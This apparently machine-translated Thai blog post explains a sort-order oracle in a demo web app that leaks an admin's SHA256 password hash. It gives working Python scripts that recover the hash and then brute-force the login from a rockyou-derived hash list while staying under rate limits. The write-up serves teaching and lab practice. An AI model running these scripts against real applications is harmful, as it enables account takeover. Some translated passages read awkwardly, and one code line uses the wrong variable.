จัดเรียงวิธีการของคุณเพื่อขโมยรหัสผ่าน
การแนะนำ
เมื่อเร็ว ๆ นี้ฉันพบช่องโหว่เฉพาะที่ทำให้ฉันทำการสกัดรหัสผ่านได้ แม้ว่าข้อมูลจะถูกแก้ไขอย่างถูกต้องก็ตาม
เพื่อแสดงให้เห็นถึงผลกระทบในทางปฏิบัติของช่องโหว่นี้ ฉันได้พัฒนาสคริปต์ที่ใช้วิธีเปรียบเทียบอักขระต่ออักขระ โดยค่อยๆ สร้างแฮชรหัสผ่านของผู้ดูแลระบบโดยแยกประเภทผู้ใช้และสังเกตตำแหน่งของผู้ใช้ วิธีการนี้แม้จะใช้เวลานาน แต่นำเสนอโอกาสพิเศษในการถอดรหัสแฮชรหัสผ่าน SHA256 โดยไม่ต้องอาศัยเทคนิคการบังคับเดรัจฉานแบบดั้งเดิม
การสำรวจเว็บแอปพลิเคชัน
เพื่อแสดงช่องโหว่นี้ ฉันได้สร้างเว็บแอปพลิเคชันสาธิตที่จำลองข้อบกพร่องด้านความปลอดภัยนี้ การสาธิตนี้ได้รับการเทียบท่าและสามารถดาวน์โหลดได้ที่นี่หากคุณต้องการลองใช้กับเครื่องของคุณเอง เว็บแอปพลิเคชันมีลักษณะดังนี้:
แอปพลิเคชันเป็นแบบพื้นฐาน ประกอบด้วยตารางผู้ใช้ที่มีตัวเลือกในการจัดเรียง เพิ่มผู้ใช้ใหม่ และลบผู้ใช้ทั้งหมด ในสถานการณ์จริง ฟังก์ชันนี้น่าจะล้ำหน้ากว่าและปลอดภัยหลังการรับรองความถูกต้อง
ค้นหาจุดบกพร่อง
ขณะดำเนินการตามระเบียบวิธีรักษาความปลอดภัยของเว็บแอปพลิเคชันมาตรฐาน ฉันสังเกตเห็นสิ่งที่น่าสนใจเมื่อพูดถึงตารางผู้ใช้ การใช้ Burp Suite ทำให้ฉันเห็นว่ามีการส่งคำขอเมื่อฉันดูหน้า index.html ที่จัดเรียงผู้ใช้ในตาราง:
ตอนนี้ นี่ไม่ใช่สิ่งที่ผิดปกติเป็นพิเศษ แต่หลังจากลองวิธีต่างๆ ในการจัดเรียงคอลัมน์ ฉันพบว่าตำแหน่งผู้ใช้เปลี่ยนไปเมื่อฉันจัดเรียงด้วยpassword_hash !
มันค่อนข้างแปลก เนื่องจากในภาพหน้าจอด้านบน แฮชทั้งหมดถูกREDACTEDดังนั้น จึงไม่ควรเปลี่ยนตำแหน่งเมื่อจัดเรียงตามฟิลด์นั้น??
เพื่อหาสาเหตุที่สิ่งนี้เกิดขึ้น ฉันได้วิเคราะห์โค้ดและพบสิ่งนี้:
# Getting users for the table on index.html
@app.route('/users')
def get_users():
sort_col = request.args.get('sort_col', default='id')
sort_order = request.args.get('sort_order', default='asc')
sorted_users = sorted(
users, key=lambda u: u[sort_col], reverse=(sort_order == 'dec'))
redacted_users = []
for user in sorted_users:
redacted_user = user.copy()
redacted_user['password_hash'] = 'REDACTED'
redacted_users.append(redacted_user)
return jsonify(redacted_users)
ในทางทฤษฎี หากเรารู้หรือเดากลไกการแฮชรหัสผ่านได้ (ปกติคือ SHA256, MD5 หรือ bcrypt) เราสามารถสร้างผู้ใช้ใหม่ด้วยรหัสผ่านที่เรารู้ว่าแฮชคืออะไร และใช้รหัสผ่านนั้นในการเรียงลำดับผู้ใช้เพื่อระบุ รหัสผ่านของผู้ดูแลระบบ
ในแผนภาพด้านบน รหัสผ่านของผู้ดูแลระบบคือโดนัทซึ่งมีแฮช SHA256 เป็น2f63371bea3c61d9fdba4469984bd22f2cc2381d23e031634f0387bdd97bd28f
เป้าหมายของฉันคือส่งคืนผู้ใช้ที่เป็นผู้ดูแลระบบในรายการก่อนหน้าฉัน เมื่อสิ่งนั้นเกิดขึ้น ฉันรู้ว่าแฮชของฉันเริ่มต้นด้วยค่าก่อนผู้ดูแลระบบ ดังนั้นในกรณีข้างต้น แฮชของฉันน้อยกว่าผู้ดูแลระบบ ดังนั้นจึงส่งคืน [ฉัน ผู้ดูแลระบบ]
ในไดอะแกรมนี้ ฉันอัปเดตรหัสผ่านเป็น 72yY2GEp41 ซึ่งส่งผลให้แฮช SHA256 เป็น240ba23967c8a19f98e7315b1198b1aebd203836435c5f0d03dbfd84d11853db เมื่อเรียกใช้ ฟังก์ชัน check()ฉันยังคงเป็นอันดับแรกในรายการ อย่างไรก็ตาม ฟังก์ชันกำลังตรวจสอบว่าอักขระตัวแรกเหมือนกันกับ "2" == "2" จากนั้นตรวจสอบอักขระถัดไป "f" > "4" ซึ่งจะส่งคืนค่าแฮชของฉันก่อน
สุดท้าย เมื่อแฮชรหัสผ่านของฉันขึ้นต้นด้วยอักขระ "3" ซึ่งมากกว่าแฮชรหัสผ่านของผู้ดูแลระบบซึ่งขึ้นต้นด้วย "2" ดังนั้น ผู้ดูแลระบบจะกลับมาเป็นอันดับแรกในรายการ และเราสามารถระบุได้ว่าแฮชรหัสผ่านของผู้ดูแลระบบมี "2" ในช่องดัชนี[0] ! เจ๋งไปเลย! ตอนนี้ให้เปลี่ยนทฤษฎีนี้เป็นรหัส
เปลี่ยนทฤษฎีเป็นรหัส
วิธีแก้ไขปัญหาของฉันค่อนข้างช้า ดังนั้นหากคุณทราบวิธีที่มีประสิทธิภาพมากกว่านี้ โปรดแสดงความคิดเห็นและแจ้งให้เราทราบ!
กระบวนการที่ฉันใช้เพื่อแยกแฮชรหัสผ่านของผู้ดูแลระบบมีดังนี้:
- เขียนฟังก์ชันบางอย่างสำหรับสร้างผู้ใช้ใหม่ด้วยรหัสผ่านที่ฉันเลือก ล้างตารางผู้ใช้ และจัดเรียงผู้ใช้ รหัสที่ฉันสร้างขึ้นมีดังต่อไปนี้:
domain = "lab.prodefense.io"
def create_user(email='[email protected]', name='matt', password='hackyhack'):
url = f"http://{domain}/users"
json = {"email": email, "name": name, "password": password}
requests.post(url, json=json)
def clear_users():
url = f"http://{domain}/users"
requests.delete(url)
def sort_users(direction='asc'):
url = f"http://{domain}/users?sort_col=password_hash&sort_order={direction}"
r = requests.get(url)
return r.text
2. ต่อไป ฉันสร้างฟังก์ชันชื่อcheck()เพื่อดูว่าการตอบกลับ json จาก ฟังก์ชัน sort_users()ส่งคืนตารางผู้ใช้ที่มีผู้ใช้ที่เป็นผู้ดูแลระบบเป็นอันดับแรกในรายการ หรือเป็นลำดับที่สอง :
def check():
users = json.loads(sort_users())
return users[0]['id'] == 1
3. ตอนนี้ฉันต้องสามารถค้นหาแฮช SHA256 ที่ขึ้นต้นด้วยคำนำหน้า และส่งคืนทั้งสตริงที่ใช้สร้างแฮชนั้นและตัวแฮชเอง
ตัวอย่างเช่น ถ้าฉันรู้ว่า admin_hash ของฉันคือ: 8c 6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918
จากนั้นสิ่งที่ฉันต้องทำคือสร้างแฮชที่ฉันสามารถใช้เพื่อเรียงลำดับได้ ดังนั้น my_hash อาจมีลักษณะดังนี้: 87 227afead5d3d1a5b89bf07a673510114b1d98d473d43e0ff7e3b230032311e แนวคิดนี้คือเนื่องจากฉันสามารถจัดเรียงฐานข้อมูลได้ ฉันจึงสามารถระบุได้ว่า admin_hash นั้นขึ้นหรือลงเมื่อเทียบกับ my_hash ดังนั้น8c6976e... จะแสดงก่อน 87227af...เพราะ8' s เท่ากัน แต่"c"มาก่อน " 7"หากการเรียงลำดับของฉันเป็นค่าจากมากไปน้อย รับความคิด?
ตอนนี้สิ่งที่ฉันต้องทำคือไปทีละตัวอักษร สร้างแฮชที่มีคำนำหน้าจนกว่าฉันจะมีทั้งรหัสผ่านแบบข้อความธรรมดาและแฮชของผู้ดูแลระบบ ในการทำเช่นนั้นรหัสของฉันมีลักษณะดังนี้:
def gen_hash(prefix):
while True:
random_string = ''.join(random.choices(
string.ascii_letters + string.digits, k=10))
sha256_hash = hashlib.sha256(random_string.encode()).hexdigest()
if sha256_hash.startswith(prefix):
return random_string, sha256_hash
4. เมื่อฉันให้ฟังก์ชันนี้ทำงาน สิ่งสุดท้ายที่ฉันต้องการคือตรรกะในการฟัซอักขระทีละอักขระ จนกว่าจะได้แฮชที่ตรงกับผู้ดูแลระบบ! ในการทำเช่นนี้รหัสของฉันดูเหมือน:
if __name__ == '__main__':
# SHA256 hashes can only have 0-9, a-f which limits our bank significantly.
bank = '0123456789abcdef'
value = []
# 64 chars is the length of a SHA256 hash
while len(value) <= 64:
found_match = False
for char in bank:
# Sends the POST request to clear all users but admin
clear_users()
# Ill talk about the 'ff' below :sad-doge:
rand_string, hash = gen_hash("".join(value) + char + 'ff')
# Creates a new user, with the random string that has our prefix
create_user(password=rand_string)
# Checking to see if admin comes first or second in the table
if check():
value.append(char)
found_match = True
break
# Adds some animation because who likes boring CLIs
print(f"[!] ADMIN HASH: {''.join(value)}{char}", end='\r')
time.sleep(0.1)
if not found_match:
value.append('0' if not value else 'f')
print("\n[!] FINAL ADMIN HASH: " + ''.join(value))
โดยรวมแล้ว หากคุณรวมโค้ดทั้งหมดเข้าด้วยกัน คุณจะเห็นบางอย่างเช่น GIF ด้านล่างในคอนโซลของคุณ:
คุณสามารถเห็นใน GIF ว่าฉันได้รับอักขระเพียงไม่กี่ตัว จากนั้นมันก็เริ่มช้าลงจริงๆ นั่นเป็นเพราะเราค่อนข้างดุรหัสผ่านผู้ใช้ที่เป็นผู้ดูแลระบบ นี่เป็นข้อจำกัดใหญ่ และผู้โจมตีอาจต้องใช้เวลามากในการสร้างรหัสผ่าน ข้อแตกต่างเพียงอย่างเดียวระหว่างสิ่งนี้กับ Bruteforce ทั่วไปคือข้อจำกัดนั้นเกิดจากพลังการคำนวณในคอมพิวเตอร์ของคุณ การค้นหาแฮชที่ขึ้นต้นด้วยอักขระ 5 ตัวขึ้นไปนั้นใช้เวลานาน เว้นแต่คุณจะคำนวณแฮชไว้ล่วงหน้าหรือมีตารางสายรุ้งขนาดใหญ่ให้ค้นหา โดยรวมแล้ว การรับ bruteforce อย่างเต็มรูปแบบเช่นนี้น่าจะต้องใช้คำขอประมาณ 500 รายการไปยังเซิร์ฟเวอร์ และคุณต้องสร้างสตริงเป็นตันเพื่อรับค่าแฮชที่ถูกต้อง
ไม่ใช่ Bruteforce ทั่วไปของคุณ
แอปพลิเคชันสาธิตสร้างขึ้นในการจำกัดอัตราด้วย 200 req/hr บน endpoints หลัก และ 20 req/hr บน endpoint การล็อกอิน เมื่อคำนึงถึงสิ่งนี้ การโจมตีแบบเดรัจฉานอาจต้องใช้คำขอหลายล้านครั้งในการเดารหัสผ่าน แต่ถ้าฉันบอกคุณว่าเราสามารถทำได้โดยมีคำขอน้อยกว่า 200 รายการ ให้ดำดิ่งลงไปในวิธีการทำงาน
คล้ายกับวิธีที่ฉันใช้กับสคริปต์ Solve.py ตัวแรก ในวิธี นี้เราจะถือว่ารหัสผ่านถูกสุ่มเลือกจากrockyou.txt ตอนนี้มันโกงไปหน่อย แต่rockyou.txtมีรหัสผ่าน 14,344,394 (14 ล้าน) ในรายการ เราจะต้อง "เดา" รหัสผ่านในคำขอที่ต่ำกว่า 200 เพื่อหลีกเลี่ยงการตรวจจับและการจำกัดอัตรา มาเริ่มกันเลย.
- คล้ายกับสคริปต์ Solve.py ตัวแรก ฉันจะใช้ฟังก์ชันเดียวกันกับที่โต้ตอบกับเว็บแอปพลิเคชัน แต่ฉันจะสร้างฟังก์ชันการเข้าสู่ระบบด้วย:
domain = "lab.prodefense.io"
def create_user(email='[email protected]', name='matt', password='hackyhack'):
url = f"http://{domain}/users"
json = {"email": email, "name": name, "password": password}
requests.post(url, json=json)
def clear_users():
url = f"http://{domain}/users"
requests.delete(url)
def sort_users(direction='asc'):
url = f"http://{domain}/users?sort_col=password_hash&sort_order={direction}"
r = requests.get(url)
return r.text
def login(username, password):
url = f"http://{domain}/login"
json = {"username": username, "password": password}
r = requests.post(url, json=json)
return r.status_code
import hashlib
with open('rockyou.txt', 'r', encoding='utf-8') as input_file:
with open('combined.txt', 'w') as output_file:
for line in input_file:
line = line.strip()
hashed_line = hashlib.sha256(line.encode()).hexdigest()
output_file.write(f'{hashed_line},{line}\n')
print('Conversion completed. Check combined.txt file.')
2. ตอนนี้ฉันจำเป็นต้องเขียนฟังก์ชันที่สามารถทำงานคล้ายกับ ฟังก์ชัน gen_hash(คำนำหน้า) ของฉัน แต่ต้องสแกนผ่านไฟล์ combination.txt ใหม่ของเราเพื่อค้นหาแฮชที่อาจเป็นแฮชรหัสผ่านของผู้ใช้ตามคำนำหน้า ฉันพนันได้เลยว่าคุณจะเห็นว่าตอนนี้ฉันกำลังทำอะไรอยู่ :)
def find_hashes(prefix):
hashes = []
passwords = []
with open('combined.txt', 'r', errors='replace') as file:
for line in file:
line = line.strip()
if line.startswith(prefix):
values = line.split(',')
if len(values) == 2:
sha256, password = values
hashes.append(sha256)
passwords.append(password)
return hashes, passwords
3. หน้า /เข้าสู่ระบบอนุญาตเพียง 20 ครั้ง/ชม. ดังที่ได้กล่าวไปแล้ว ฉันต้องได้รับค่านำหน้าของฉันให้นานพอที่จะเรียกฟังก์ชันfind_hashes()และให้ส่งคืนรหัสผ่าน 20 (หรือน้อยกว่า) ที่เริ่มต้นด้วยค่านำหน้าที่กำหนด
Possible password hashes (notice they all start with the prefix):
hash_prefix: "b60d9"
055555:b60d92f92101e5210a530631ec3ad59c32ecdc3fd3ab75ac1291cedcaf6fee77
cordelius:b60d914e40a9572820f571d8cf38e8425742a8a1cd6c5586f35a6c7e73e39dcf
terfase:b60d920aa0cabdbdcf7447632bcdb9456a35c4378db17137066aee36d3aeea12
obolku:b60d9db875658b618b27f0a2d4c869628a9f937ea6c1a0172d4a6acc2f219846
escuelapan2:b60d9852d3325c01b7556719dd1e9b684017b8306fc1902eb9e6298250459735
...etc...
def bruteforce(password_list):
for pwd in password_list:
if login('admin', pwd) == 200:
print(
f"[!] ADMIN PASSWORD: {colored(pwd, 'green')}")
sys.exit(0)
if __name__ == '__main__':
api_call_count = 0
prefix = ""
bank = '0123456789abcdef'
for i in range(10):
found_match = False
for char in bank:
clear_users()
pwd, hash_value = gen_hash(prefix+char+'f')
create_user(password=pwd)
api_call_count += 3
if check():
found_match = True
prefix += char
tmp_hashes, tmp_passwords = find_hashes(prefix)
if (len(tmp_hashes) < 20):
print(
f"[!] PARTIAL ADMIN HASH: {colored(prefix, 'green')}")
bruteforce(tmp_passwords)
break
print(
f"[!] FINDING HASH: {prefix}{colored(char, 'red')} - [INFO] API Calls Sent: {api_call_count}/200'", end='\r')
time.sleep(0.2)
if not found_match:
hash += 'f' if hash else '0'
สคริปต์ Solve.py นี้ใช้เวลา 2 นาที 30 วินาที และใช้คำขอ 87 รายการ แฮชรหัสผ่านนั้นสุ่มอย่างสมบูรณ์ใน รายการคำศัพท์ ของ rockyou.txtซึ่งมีรหัสผ่าน 14,344,394 (14 ล้าน)
บทสรุป
แม้ว่าเว็บแอปพลิเคชันสาธิตของฉันอาจไม่ได้รับรางวัลใด ๆ สำหรับ "เว็บแอปที่ปลอดภัยที่สุดแห่งปี" แต่ก็แสดงให้เห็นอย่างชัดเจนว่าข้อบกพร่องบางประเภทนั้นมีลักษณะเฉพาะตัวได้อย่างไร และเหตุใด chatGPT จึงไม่รับงานของฉันในเร็วๆ นี้
นอกเหนือจากเรื่องตลกแล้ว ช่องโหว่นี้ที่ช่วยให้ผู้โจมตีสามารถค้นหารหัสผ่านที่ถูกขโมยได้ จะช่วยชี้ให้เห็นถึงความเสี่ยงที่อาจเกิดขึ้นซึ่งซ่อนอยู่ภายในฟังก์ชันการทำงานที่ดูเหมือนไม่เป็นอันตราย ด้วยการวิเคราะห์อย่างถี่ถ้วนและแนวทางที่ชาญฉลาด ผู้โจมตีสามารถแยกแฮชรหัสผ่านจากเว็บแอปพลิเคชันที่มีช่องโหว่ได้หากไม่ระมัดระวัง
หมายเหตุ: หากคุณชอบบล็อกโพสต์นี้และต้องการลองสร้างสคริปต์โซลูชันของคุณเอง เราได้สร้างคอนเทนเนอร์นักเทียบท่าที่สร้างรหัสผ่านผู้ดูแลระบบแบบสุ่มซึ่งสามารถดาวน์โหลดได้ที่นี่ มีความสุขในการแฮ็ก !